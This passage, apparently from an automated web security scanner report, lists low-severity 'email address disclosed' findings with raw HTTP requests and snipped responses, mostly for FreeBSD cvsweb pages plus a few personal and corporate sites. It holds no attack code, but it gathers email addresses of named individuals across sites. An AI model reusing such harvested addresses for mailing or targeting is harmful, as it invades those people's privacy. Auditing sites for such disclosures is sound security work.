Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et-ee" lang="et-ee" >
<he
...[SNIP]...
<a target="_blank" title="Eraser @ MSN" mce_href="http://mce_host/msnim:add?contact=eraser@eraser.ee" href="http://mce_host/msnim:add?contact=eraser@eraser.ee">
...[SNIP]...

24.178. http://www.exit109.com/~jeremy/news/cleanfeed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.exit109.com
Path:	/~jeremy/news/cleanfeed.html

Issue detail

The following email address was disclosed in the response:

webmaster@exit109.com

Request

GET /~jeremy/news/cleanfeed.html HTTP/1.1
Host: www.exit109.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 16:04:59 GMT
Server: Apache/1.3.37 (Unix) mod_jk/1.2.15 PHP/5.2.14 mod_ssl/2.8.28 OpenSSL/0.9.8c
Location: http://www.exit109.com/~jeremy/news/cleanfeed/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 365

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.exit109.com/~je
...[SNIP]...
<A HREF="mailto:webmaster@exit109.com">
...[SNIP]...

24.179. http://www.fiction.net/blong/programs/#aub/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fiction.net
Path:	/blong/programs/#aub/x26amp

Issue detail

The following email addresses were disclosed in the response:

blong@fiction.net
fox@convex.hp.com
ley@rz.uni-karlsruhe.de
wfp5p@virginia.edu

Request

GET /blong/programs/#aub/x26amp HTTP/1.1
Host: www.fiction.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:12 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14165

<HTML>
<HEAD>
<TITLE>Brandon's Program Archive</TITLE>
</HEAD>
<BODY BGCOLOR=#ffffff>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javas
...[SNIP]...
<a href="mailto:blong@fiction.net">blong@fiction.net</a>
...[SNIP]...
</A>
This program was written by Andreas Ley (ley@rz.uni-karlsruhe.de). It converts
any GIF to a GIF89a and allows for setting the transparent and background color,
changing colors, adding or removing comments, and anaylyzing GIF contents.
A must for the Un*x based Web
...[SNIP]...
</A>
XBuffy was written by Bill Pemberton (wfp5p@virginia.edu) and was
based on Xmultibiff. It allows the user to specify multiple mail folders
which XBuffy will watch for incoming mail. The first patch below is
by David DeSimone (fox@convex.hp.com) and
fixes a couple of bugs and makes sure that XBuffy doesn't change the
mtime and atime of the folder so that XBuffy doesn't interfere with
other programs which check for new mail, such as the mailb
...[SNIP]...
<a href="mailto:blong@fiction.net">blong@fiction.net</a>
...[SNIP]...

24.180. http://www.foxaudiencenetwork.com/aboutus_contactus.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxaudiencenetwork.com
Path:	/aboutus_contactus.php

Issue detail

The following email address was disclosed in the response:

name@domain.com

Request

GET /aboutus_contactus.php HTTP/1.1
Host: www.foxaudiencenetwork.com
Proxy-Connection: keep-alive
Referer: http://www.foxaudiencenetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=fan-foxaudience%3D%2526pid%253DFAN%25253AHomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.foxaudiencenetwork.com/aboutus_contactus.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
[a-zA-Z]{2,3}$/;
   if (emailad != "")
   {
       if(((emailad.search(exclude) != -1) || (emailad.search(check)) == -1) || (emailad.search(checkend) == -1)) {
           alert("Please enter a valid email address (name@domain.com)");
           document.theForm.email.value="";
           document.theForm.email.focus();
           return false;
       }
   }
   return true;
}

// -->
...[SNIP]...

24.181. http://www.freebsd.org/about.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/about.html

Issue detail

The following email address was disclosed in the response:

board@FreeBSDFoundation.org

Request

GET /about.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2544596647"
Last-Modified: Fri, 31 Dec 2010 18:24:30 GMT
Content-Length: 9564
Connection: close
Date: Mon, 24 Jan 2011 16:19:40 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a
href="mailto:board@FreeBSDFoundation.org">board@FreeBSDFoundation.org</a>
...[SNIP]...

24.182. http://www.freebsd.org/cgi/cvsweb.cgi/ports/chinese/pine4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/chinese/pine4

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/chinese/pine4 HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/chinese/pine4/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.183. http://www.freebsd.org/cgi/cvsweb.cgi/ports/chinese/tin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/chinese/tin

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/chinese/tin HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/chinese/tin/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.184. http://www.freebsd.org/cgi/cvsweb.cgi/ports/converters/mpack previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/converters/mpack

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/converters/mpack HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/converters/mpack/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7107

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.185. http://www.freebsd.org/cgi/cvsweb.cgi/ports/deskutils/kdepim3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/deskutils/kdepim3

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/deskutils/kdepim3 HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/deskutils/kdepim3/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7108

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.186. http://www.freebsd.org/cgi/cvsweb.cgi/ports/german/unix-connect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/german/unix-connect

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/german/unix-connect HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/german/unix-connect/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:35 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.187. http://www.freebsd.org/cgi/cvsweb.cgi/ports/japanese/slrn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/japanese/slrn

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/japanese/slrn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/japanese/slrn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:43 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.188. http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/adcomplain previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/mail/adcomplain

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/mail/adcomplain HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/mail/adcomplain/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.189. http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/alpine previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/mail/alpine

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/mail/alpine HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/mail/alpine/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.190. http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/claws-mail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/mail/claws-mail

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/mail/claws-mail HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/mail/claws-mail/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:28 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.191. http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/lmtp2nntp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/mail/lmtp2nntp

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/mail/lmtp2nntp HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/mail/lmtp2nntp/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:29 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.192. http://www.freebsd.org/cgi/cvsweb.cgi/ports/net/pear-Net_NNTP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/net/pear-Net_NNTP

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/net/pear-Net_NNTP HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/net/pear-Net_NNTP/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7108

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.193. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/atp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/atp

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/atp HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/atp/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.194. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/aub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/aub

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/aub HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/aub/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.195. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/bgrab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/bgrab

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/bgrab HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/bgrab/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.196. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/brag previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/brag

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/brag HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/brag/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.197. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/c-nocem previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/c-nocem

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/c-nocem HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/c-nocem/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.198. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/cg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/cg

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/cg HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/cg/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:21:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7098

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.199. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/cleanfeed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/cleanfeed

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/cleanfeed HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/cleanfeed/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:22:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.200. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/crashmail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/crashmail

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/crashmail HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/crashmail/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:22:47 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.201. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/dnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/dnews

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/dnews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/dnews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:22:49 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.202. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/fidogate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/fidogate

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/fidogate HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/fidogate/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:23:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.203. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/fidogate-ds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/fidogate-ds

Issue detail

